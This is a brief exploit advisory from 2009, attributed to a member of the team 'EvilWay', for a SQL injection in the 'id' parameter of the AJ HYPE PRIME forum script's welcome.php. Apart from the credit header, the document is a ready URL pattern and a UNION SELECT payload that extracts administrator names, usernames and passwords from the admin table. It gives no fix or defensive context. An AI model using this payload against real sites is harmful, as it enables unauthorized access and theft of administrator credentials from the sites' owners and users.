/*
AJ HYPE PRIME (id) Remote SQL Injection Vulnerability
Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay
Date : July 29 2009
Greetings : Moudi , Zuka, All friends
*/
SQL Injection welcome.php (GET : id) :
[HOST]/[PATH]/forum/welcome.php?id=[SQL CODE]
SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password)+from+admin--